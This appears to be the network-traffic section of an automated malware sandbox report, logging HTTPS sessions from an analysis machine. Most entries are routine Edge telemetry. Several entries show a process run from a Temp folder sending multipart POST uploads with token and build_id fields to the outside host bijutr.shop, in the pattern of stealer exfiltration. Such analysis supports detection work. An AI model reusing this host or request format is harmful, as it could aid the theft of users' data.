2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------ASRIWLNYCBIEUAAI5F37Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------ASRIWLNYCBIEUAAI5F37Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------ASRIWLNYCBIEUAAI5F37Cont
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:47 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:50 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50016	20.42.73.30	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:48 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279845645&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3869 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1
2024-12-27 06:10:48 UTC	3869	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 31 30 3a 34 35 2e 36 34 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 62 65 62 65 36 32 61 34 2d 63 33 33 32 2d 34 36 65 30 2d 62 39 38 33 2d 65 37 66 36 63 37 37 32 38 62 61 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 32 32 32 36 33 31 33 33 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T06:10:45.641Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"bebe62a4-c332-46e0-b983-e7f6c7728ba6","epoch":"4222631333"},"app":{"locale
2024-12-27 06:10:49 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=e47d41f5d8364416addffddd6137d8c8&HASH=e47d&LV=202412&V=4&LU=1735279849263; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:49 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=b5da2ffca85e42a783c805e0a4f7d4cf; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:49 GMT; Path=/;Secure; SameSite=None time-delta-millis: 3618 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 27 Dec 2024 06:10:49 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50028	108.139.47.108	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:49 UTC	1012	OUT	GET /b2?rn=1735279845647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2553C31DEE6B611F1DE5D67FEF6C6080&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=15166cfb5c5b57cbb43e95c1735279847; XID=15166cfb5c5b57cbb43e95c1735279847
2024-12-27 06:10:49 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Fri, 27 Dec 2024 06:10:49 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 b0e346c8169b4f8b2ad260265d95ff1a.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: wApzrjIgK6bb-rDmW72ksDA3BUvgy5n0tUCBTstjm6A20Ias8JU9Mw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50029	20.110.205.119	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:49 UTC	1261	OUT	GET /c.gif?rnd=1735279845647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=eaad338094814ebcb2326dd2842d0ca1&activityId=eaad338094814ebcb2326dd2842d0ca1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0118A228C46841D29A7548549B7CD78F&MUID=2553C31DEE6B611F1DE5D67FEF6C6080 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=2553C31DEE6B611F1DE5D67FEF6C6080; _EDGE_S=F=1&SID=11E8212B6A8D6603116A34496B9E67B0; _EDGE_V=1; SM=T
2024-12-27 06:10:50 UTC	982	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT Accept-Ranges: bytes ETag: "9270eb7934bdb1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=2553C31DEE6B611F1DE5D67FEF6C6080; domain=.msn.com; expires=Wed, 21-Jan-2026 06:10:50 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=2553C31DEE6B611F1DE5D67FEF6C6080; domain=c.msn.com; expires=Wed, 21-Jan-2026 06:10:50 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 06:10:50 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:20:50 GMT; path=/; SameSite=None; Secure; Date: Fri, 27 Dec 2024 06:10:49 GMT Connection: close Content-Length: 42
2024-12-27 06:10:50 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50030	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:50 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XT2DBS0R1N7YUA1DB1NY User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 131557 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 58 54 32 44 42 53 30 52 31 4e 37 59 55 41 31 44 42 31 4e 59 0d 0a 43 6f 6e 74 Data Ascii: ------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------XT2DBS0R1N7YUA1DB1NYContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------XT2DBS0R1N7YUA1DB1NYCont
2024-12-27 06:10:50 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
